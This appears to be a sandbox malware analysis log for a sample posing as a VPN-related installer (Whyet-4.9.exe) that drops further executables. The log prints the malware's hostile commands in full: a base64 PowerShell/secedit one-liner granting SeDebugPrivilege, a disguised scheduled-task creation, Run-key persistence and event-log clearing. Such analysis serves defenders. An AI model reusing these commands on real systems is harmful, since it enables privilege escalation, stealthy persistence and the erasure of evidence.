Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Code function: 0_2_00007FF676FA5D98 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00007FF676FA5D98

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: iusb3mon.exe.17.dr	Static PE information: real checksum: 0x300e18 should be: 0x30561c
Source: irsetup.exe.0.dr	Static PE information: real checksum: 0x4f4144 should be: 0x4f9bcf
Source: LxN_oT.exe.2.dr	Static PE information: real checksum: 0x300e18 should be: 0x30561c

Source: irsetup.exe.0.dr	Static PE information: section name: text
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name: .winlice
Source: LxN_oT.exe.2.dr	Static PE information: section name: .boot
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name: .winlice
Source: iusb3mon.exe.17.dr	Static PE information: section name: .boot

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C378 push rdx; ret	2_2_000000018001C381
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C388 push rdx; ret	2_2_000000018001C389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8488E00BD pushad ; iretd	12_2_00007FF8488E00C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04FB2CF5 pushfd ; retf	19_2_04FB2DA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04FB2DA5 pushfd ; retf	19_2_04FB2DA9
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_00576074 push ecx; ret	32_2_00576087
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_006E49FA push 5ED99930h; mov dword ptr [esp], edx	32_2_0085F9C1
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_006E49FA push 35F89B5Fh; mov dword ptr [esp], ebp	32_2_0085F9D7
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_006E49FA push edi; mov dword ptr [esp], esi	32_2_0085FA33
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D8E548 push ebp; retf	32_2_04D8E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D8E541 push ebp; retf	32_2_04D8E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D79ED0 push eax; ret	32_2_04D79EFE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D79E44 push eax; ret	32_2_04D79E62
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D3A48F push eax; ret	32_2_04D3A4BD
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D3A403 push eax; ret	32_2_04D3A421
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D4DD9F push ss; ret	32_2_04D4DDA2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D4DD63 push edx; ret	32_2_04D4DD66
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D4EB00 push ebp; retf	32_2_04D4EB0B

Source: LxN_oT.exe.2.dr	Static PE information: section name: entropy: 7.974289501333251
Source: iusb3mon.exe.17.dr	Static PE information: section name: entropy: 7.974289501333251

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	File created: C:\ProgramData\Program\iusb3mon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Whyet-4.9.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Whyet-4.9.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Program Files\product1\letsvpn-latest.exe	Jump to dropped file

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

File created: C:\ProgramData\Program\iusb3mon.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\ProgramData\Program\iusb3mon.exe

32_2_04D767CC

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D83F29 IsIconic,GetWindowPlacement,GetWindowRect,

32_2_04D83F29

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D73B39 OpenEventLogA,ClearEventLogA,CloseEventLog,

32_2_04D73B39

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D7838B CreateThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,

32_2_04D7838B

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Whyet-4.9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
